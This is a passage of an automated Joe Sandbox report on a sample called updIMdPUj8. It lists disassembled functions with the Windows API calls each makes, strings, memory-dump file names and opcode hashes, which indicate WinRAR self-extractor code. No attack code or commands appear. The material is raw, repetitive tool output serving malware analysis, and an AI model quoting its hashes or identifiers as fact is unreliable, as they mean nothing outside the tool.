                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00B3E669,00B3E5CC,00B3E86D), ref: 00B3E605
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00B3E61B
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00B3E630
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                          • API String ID: 667068680-1718035505
                                                                                                                                                                          • Opcode ID: 580cbecad394db7f080b2b1ce7e80ed6233389a70a3052bfa5d3200ad3812e82
                                                                                                                                                                          • Instruction ID: 91ef141f19aef4fadd96736c774e6cb0b70110d5d9a90e0fa8ad365fbd3879cb
                                                                                                                                                                          • Opcode Fuzzy Hash: 580cbecad394db7f080b2b1ce7e80ed6233389a70a3052bfa5d3200ad3812e82
                                                                                                                                                                          • Instruction Fuzzy Hash: 25F0C2327813225B0F214E695C9676672CCEA35792B2408FBE921D72E0EF10CC559F90
                                                                                                                                                                          Function 00B3146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B314C2
                                                                                                                                                                            • Part of subcall function 00B2B146: GetVersionExW.KERNEL32(?), ref: 00B2B16B
                                                                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B314E6
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B31500
                                                                                                                                                                          • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00B31513
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B31523
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B31533
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2092733347-0
                                                                                                                                                                          • Opcode ID: 624dd6471f62a8cc0fb48913edd4ef89ca64a684da9746cc2147aaaeffd9653d
                                                                                                                                                                          • Instruction ID: 800a8a02292ff37aa21442e2f2d2cce3bb1cf0aac00a973b171c328e82c5a4f0
                                                                                                                                                                          • Opcode Fuzzy Hash: 624dd6471f62a8cc0fb48913edd4ef89ca64a684da9746cc2147aaaeffd9653d
                                                                                                                                                                          • Instruction Fuzzy Hash: BA31F775118345ABC704DFA8C88599BB7F8BF98754F004A1EF999D3210E730D509CBA6
                                                                                                                                                                          Function 00B42AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00B42AF1,00B402FC,00B3FA34), ref: 00B42B08
                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B42B16
                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B42B2F
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,00B42AF1,00B402FC,00B3FA34), ref: 00B42B81
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                          • Opcode ID: 37c74537ce9946b900dac82d9798911b7ae1fadeea48f8bb3ff8dbb5fe499cdb
                                                                                                                                                                          • Instruction ID: 1d9b42250ce544f111ef4029a9abbe956d6184c9ec1b2a109f6fcd73cbdf38b5
                                                                                                                                                                          • Opcode Fuzzy Hash: 37c74537ce9946b900dac82d9798911b7ae1fadeea48f8bb3ff8dbb5fe499cdb
                                                                                                                                                                          • Instruction Fuzzy Hash: E401D43250A7116EAA192F747C85B2A2FD9EB45BB6BE407F9F120561E0EF118F00B154
                                                                                                                                                                          Function 00B497E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,00B61030,00B44674,00B61030,?,?,00B43F73,00000050,?,00B61030,00000200), ref: 00B497E9
                                                                                                                                                                          • _free.LIBCMT ref: 00B4981C
                                                                                                                                                                          • _free.LIBCMT ref: 00B49844
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00B61030,00000200), ref: 00B49851
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00B61030,00000200), ref: 00B4985D
                                                                                                                                                                          • _abort.LIBCMT ref: 00B49863
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                          • Opcode ID: 2654ea88e364f0ff53d21a908c2bb66655560514730fa218da88215b8b641dcf
                                                                                                                                                                          • Instruction ID: f38ca0a69b5f7d28fdea3a8e75fb9c97376d83c265cc5d41b4381d894754c8b2
                                                                                                                                                                          • Opcode Fuzzy Hash: 2654ea88e364f0ff53d21a908c2bb66655560514730fa218da88215b8b641dcf
                                                                                                                                                                          • Instruction Fuzzy Hash: 37F0A43654070166C75237286C5AB2B2BE5CFE2BB2F3501F8F624972D2FE21CB01B565
                                                                                                                                                                          Function 00B3DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B3DC47
                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B3DC61
                                                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B3DC72
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 00B3DC7C
                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 00B3DC86
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B3DC91
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2148572870-0
                                                                                                                                                                          • Opcode ID: 3b3758a603a146803e4501aec74fa7e86bdee0803b11185c24f7ee4d66e05502
                                                                                                                                                                          • Instruction ID: ad672d11bae9f3ab119728034fcc6fcfc9fea29f6695979c641c468a65ee263d
                                                                                                                                                                          • Opcode Fuzzy Hash: 3b3758a603a146803e4501aec74fa7e86bdee0803b11185c24f7ee4d66e05502
                                                                                                                                                                          • Instruction Fuzzy Hash: 04F03C72A01219BBCB206BA5EC4CECB7FADEF46B91F144111B50AE2060DA749646C7A0
                                                                                                                                                                          Function 00B2C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B305DA: _wcslen.LIBCMT ref: 00B305E0
                                                                                                                                                                            • Part of subcall function 00B2B92D: _wcsrchr.LIBVCRUNTIME ref: 00B2B944
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B2C197
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B2C1DF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$_wcsrchr
                                                                                                                                                                          • String ID: .exe$.rar$.sfx
                                                                                                                                                                          • API String ID: 3513545583-31770016
                                                                                                                                                                          • Opcode ID: 2a0a543f0dbc73cde44ff25cf39a584049eb192569bdbff9923ff88d5a919c7b
                                                                                                                                                                          • Instruction ID: b48a0316cba7a75e6752a44066877519c8a8351324615ba977ac7854b64821a0
                                                                                                                                                                          • Opcode Fuzzy Hash: 2a0a543f0dbc73cde44ff25cf39a584049eb192569bdbff9923ff88d5a919c7b
                                                                                                                                                                          • Instruction Fuzzy Hash: 8741282154037195C732AF34A852E7F7BE8EF41B44F2449CEF98A6B181EF614E95C391
                                                                                                                                                                          Function 00B3CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTempPathW.KERNEL32(00000800,?), ref: 00B3CE9D
                                                                                                                                                                            • Part of subcall function 00B2B690: _wcslen.LIBCMT ref: 00B2B696
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B3CED1
                                                                                                                                                                            • Part of subcall function 00B24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B240A5
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000066,00B6946A), ref: 00B3CEF1
                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00B3CFFE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                          • String ID: %s%s%u
                                                                                                                                                                          • API String ID: 110358324-1360425832
                                                                                                                                                                          • Opcode ID: fe84eb72c5d14cc12b68011277eaa69119d88e6d4dd41c2666603c2aac301f53
                                                                                                                                                                          • Instruction ID: 0ef95afaee608b3eb167f1b0e45b507b6a7e1d5276ce19dd3b193503ac713ec6
                                                                                                                                                                          • Opcode Fuzzy Hash: fe84eb72c5d14cc12b68011277eaa69119d88e6d4dd41c2666603c2aac301f53
                                                                                                                                                                          • Instruction Fuzzy Hash: EA4170B1900258AADF259BA0DC85EEE77FCEB04741F6080E6F909E7151EE749E48CF61
                                                                                                                                                                          Function 00B2BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B2BB27
                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00B2A275,?,?,00000800,?,00B2A23A,?,00B2755C), ref: 00B2BBC5
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B2BC3B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$CurrentDirectory
                                                                                                                                                                          • String ID: UNC$\\?\
                                                                                                                                                                          • API String ID: 3341907918-253988292
                                                                                                                                                                          • Opcode ID: 1335a4cd1ed8fc53140304b1e46bd5d310ea36bd00cb582ca7d192b510e04d6f
                                                                                                                                                                          • Instruction ID: 844e5ebd893ed2d7300b3403d5f568b99dd57049c25a28efe0cb6ab99628821f
                                                                                                                                                                          • Opcode Fuzzy Hash: 1335a4cd1ed8fc53140304b1e46bd5d310ea36bd00cb582ca7d192b510e04d6f
                                                                                                                                                                          • Instruction Fuzzy Hash: CD41B271440225B6CF21AF20EC46EEE77E9EF45790F1484E6F859A3151EF70EE94CA60
                                                                                                                                                                          Function 00B3B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadBitmapW.USER32(00000065), ref: 00B3B6ED
                                                                                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00B3B712
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00B3B744
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00B3B767
                                                                                                                                                                            • Part of subcall function 00B3A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00B3B73D,00000066), ref: 00B3A6D5
                                                                                                                                                                            • Part of subcall function 00B3A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00B3B73D,00000066), ref: 00B3A6EC
                                                                                                                                                                            • Part of subcall function 00B3A6C2: LoadResource.KERNEL32(00000000,?,?,?,00B3B73D,00000066), ref: 00B3A703
                                                                                                                                                                            • Part of subcall function 00B3A6C2: LockResource.KERNEL32(00000000,?,?,?,00B3B73D,00000066), ref: 00B3A712
                                                                                                                                                                            • Part of subcall function 00B3A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B3B73D,00000066), ref: 00B3A72D
                                                                                                                                                                            • Part of subcall function 00B3A6C2: GlobalLock.KERNEL32(00000000), ref: 00B3A73E
                                                                                                                                                                            • Part of subcall function 00B3A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00B3A762
                                                                                                                                                                            • Part of subcall function 00B3A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B3A7A7
                                                                                                                                                                            • Part of subcall function 00B3A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00B3A7C6
                                                                                                                                                                            • Part of subcall function 00B3A6C2: GlobalFree.KERNEL32(00000000), ref: 00B3A7CD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                                                                          • String ID: ]
                                                                                                                                                                          • API String ID: 1797374341-3352871620
                                                                                                                                                                          • Opcode ID: 85efe666299f111b36851e9ce7ff3d2ba50e920b6ecd39a3455f5ef092d77cb5
                                                                                                                                                                          • Instruction ID: 2f30ddc0100ea45ab95a1a8fc3a52f0961e4d0e373fe813162587969b3cdc033
                                                                                                                                                                          • Opcode Fuzzy Hash: 85efe666299f111b36851e9ce7ff3d2ba50e920b6ecd39a3455f5ef092d77cb5
                                                                                                                                                                          • Instruction Fuzzy Hash: E301C036540201A7C71277749C0AEBF7AF9EBC0B52F390091FA40B72A5DF75CD0582A2
                                                                                                                                                                          Function 00B3D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B21316: GetDlgItem.USER32(00000000,00003021), ref: 00B2135A
                                                                                                                                                                            • Part of subcall function 00B21316: SetWindowTextW.USER32(00000000,00B535F4), ref: 00B21370
                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00B3D64B
                                                                                                                                                                          • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00B3D661
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 00B3D675
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000068), ref: 00B3D684
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemText$DialogWindow
                                                                                                                                                                          • String ID: RENAMEDLG
                                                                                                                                                                          • API String ID: 445417207-3299779563
                                                                                                                                                                          • Opcode ID: eaf6f3501b665678b8bd9af625c5bb52959053704290cb1257f64b8e7b10e9c7
                                                                                                                                                                          • Instruction ID: 297530c8f786bdde1861ed1c1e6b44a6f48c0014eae81a1a14073ba040e8cb5d
                                                                                                                                                                          • Opcode Fuzzy Hash: eaf6f3501b665678b8bd9af625c5bb52959053704290cb1257f64b8e7b10e9c7
                                                                                                                                                                          • Instruction Fuzzy Hash: 4501B533284214BAD2115F74AD0AF6677EEEB9AF42F210451F615A70E0CAA2A944C769
                                                                                                                                                                          Function 00B47E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B47E24,00000000,?,00B47DC4,00000000,00B5C300,0000000C,00B47F1B,00000000,00000002), ref: 00B47E93
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B47EA6
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00B47E24,00000000,?,00B47DC4,00000000,00B5C300,0000000C,00B47F1B,00000000,00000002), ref: 00B47EC9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                          • Opcode ID: b84344c55d39420ccc04e5a82ce9e9e9b715b1eb94600a14d718f6f27b7fb159
                                                                                                                                                                          • Instruction ID: d370e3b2b260934648e5c10333ee13b73f0b337c1abf3e262dae9624934208ec
                                                                                                                                                                          • Opcode Fuzzy Hash: b84344c55d39420ccc04e5a82ce9e9e9b715b1eb94600a14d718f6f27b7fb159
                                                                                                                                                                          • Instruction Fuzzy Hash: 49F03131940308BBDB119BA0DC09BAEBFF8EB44752F0441E9F805A3260DF719F44DA90
                                                                                                                                                                          Function 00B2F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B3081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B30836
                                                                                                                                                                            • Part of subcall function 00B3081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B2F2D8,Crypt32.dll,00000000,00B2F35C,?,?,00B2F33E,?,?,?), ref: 00B30858
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B2F2E4
                                                                                                                                                                          • GetProcAddress.KERNEL32(00B681C8,CryptUnprotectMemory), ref: 00B2F2F4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
